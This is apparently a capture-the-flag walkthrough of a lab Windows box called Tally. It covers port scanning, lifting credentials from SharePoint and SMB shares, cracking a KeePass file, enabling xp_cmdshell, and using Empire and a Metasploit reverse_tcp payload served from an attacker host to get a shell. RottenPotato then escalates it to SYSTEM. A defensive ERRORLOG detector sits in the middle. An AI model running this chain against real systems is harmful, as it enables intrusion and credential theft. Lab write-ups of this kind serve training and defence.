Tally

Posted by on February 26, 2020


Port scan with nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.59 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p$ports -A 10.10.10.59
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-02-25T15:09:12
|_Not valid after:  2050-02-25T15:09:12
|_ssl-date: 2020-02-26T02:05:16+00:00; -57s from scanner time.
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-02-26T02:05:15+00:00; -57s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 or Server 2012 R2 (94%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows Server 2016 build 10586 - 14393 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows 7 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows Server 2016 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -57s, deviation: 0s, median: -57s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-26T02:04:02
|_  start_date: 2020-02-25T15:08:38

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   204.81 ms 10.10.14.1
2   768.78 ms 10.10.10.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.41 seconds

Visiting port 80 automatically redirects to a SharePoint page, which the nmap scan also indicated.

Directory brute-force with dirb turns up:
http://10.10.10.59/layouts/15/viewlsts.aspx

dirb http://10.10.10.59/

SitePages:
http://10.10.10.59/sitepages/FinanceTeam.aspx
Username: ftp_user

Documents: http://10.10.10.59/_layouts/15/viewlsts.aspx
Password: UTDRSCH53c"$6hys

Install FileZilla and browse the FTP server; tim.kdbx is found under the Tim directory.

apt-get install filezilla

Crack it with john; username and password: tim:simplementeyo

keepass2john tim.kdbx > tim
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
john --show tim

Use keepass2 to read the contents of the kdbx; the master password is simplementeyo.

apt-get install keepass2 -y
keepass2 tim.kdbx

SMB username obtained: Finance
Password: Acc0unting

Run the following command to list the target's shares; it shows "ACCT" as a share name.

smbclient -L 10.10.10.59 -U Finance

Then enter the commands below; once conn-info.txt is located, download it.

smbclient //10.10.10.59/ACCT -U Finance
Acc0unting
cd zz_Archived
cd SQL
get conn-info.txt

Reading conn-info.txt reveals an old MS SQL database username and password.

Retrieve tester.exe

smbclient //10.10.10.59/ACCT -U Finance
Acc0unting
cd zz_Migration
cd Binaries
cd "New folder"
get tester.exe

Username recovered from the binary: sa
Password: GWE3V65#6KFH93@4GWTG2G

strings tester.exe | grep DATABASE

The following commands mount the share on the Kali machine, which makes browsing the folders easier.

mkdir /mnt/share
mount -t cifs -o username=Finance,password=Acc0unting //10.10.10.59/ACCT/ /mnt/share

Install Empire

git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
sudo ./setup/reset.sh

Use Empire

listeners
uselistener http
info
set Name Tally
set Host 10.10.14.45
execute
listeners
launcher powershell Tally

Username: sa
Password: GWE3V65#6KFH93@4GWTG2G
Connect with DBeaver and open the SQL editor
Enable xp_cmdshell
Run the Empire launcher

apt-get install dbeaver
exec sp_configure 'show advanced options', 1
reconfigure
exec sp_configure 'xp_cmdshell', 1
reconfigure
xp_cmdshell 'Empire payload'
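A defender-side counterpart to this step, added here and not part of the original writeup: SQL Server writes every sp_configure change to its ERRORLOG, so enabling xp_cmdshell as above leaves a "Configuration option 'xp_cmdshell' changed from 0 to 1" line that can be alerted on. The script parses constructed sample lines in that format and reports both the enablement events and which high-risk options remain on; the option list and the sample lines are assumptions, not data from the box.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in the format SQL Server writes to its ERRORLOG when
# sp_configure changes a setting; they are not taken from the Tally box.
SAMPLE_ERRORLOG = """\
2020-02-26 02:10:01.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-02-26 02:10:01.15 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-02-26 02:10:03.40 spid55      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2020-02-26 02:15:30.01 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Options that hand a SQL login OS-level code execution; turning any of them
# on is worth an alert on its own (assumed list, extend to taste).
HIGH_RISK_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


@dataclass(frozen=True)
class ConfigChange:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int


def parse_config_changes(log_text: str) -> list[ConfigChange]:
    """Extract every sp_configure change recorded in the errorlog text."""
    changes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            changes.append(ConfigChange(m["ts"], m["spid"], m["option"],
                                        int(m["old"]), int(m["new"])))
    return changes


def find_enablements(changes: list[ConfigChange]) -> list[ConfigChange]:
    """Every event that switched a high-risk option on, even if it was later turned off again."""
    return [c for c in changes if c.option in HIGH_RISK_OPTIONS and c.old == 0 and c.new != 0]


def currently_enabled(changes: list[ConfigChange]) -> set[str]:
    """High-risk options whose most recent change leaves them on (the remediation list)."""
    state: dict[str, int] = {}
    for c in changes:  # errorlog lines are chronological, so the last write wins
        if c.option in HIGH_RISK_OPTIONS:
            state[c.option] = c.new
    return {opt for opt, val in state.items() if val != 0}


if __name__ == "__main__":
    events = parse_config_changes(SAMPLE_ERRORLOG)
    for e in find_enablements(events):
        print(f"ALERT {e.timestamp} {e.spid}: '{e.option}' enabled")
    print("still enabled:", currently_enabled(events) or "none")
```

Note that the sample deliberately turns xp_cmdshell back off: the enablement is still reported, so an attacker cleaning up after themselves does not erase the alert.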

View the agent's basic information

rename FWDL187X TALLY
interact TALLY
info

Start exploit/multi/script/web_delivery in msf

use exploit/multi/script/web_delivery
set lport 8080
set lhost 10.10.14.45
set srvhost 10.10.14.45
set srvport 5555
set target 3
set payload windows/meterpreter/reverse_tcp
run

Run it from Empire to get a meterpreter shell

usemodule code_execution/invoke_metasploitpayload
set URL http://10.10.14.45:5555/cgYYvos0Yb78W
execute

Get user.txt

There is no directly usable user token.

load incognito
list_tokens -u

Download RottenPotato from GitHub for privilege escalation and get a SYSTEM shell

git clone https://github.com/foxglovesec/RottenPotato.git
upload /root/Desktop/RottenPotato/rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid

Get root.txt
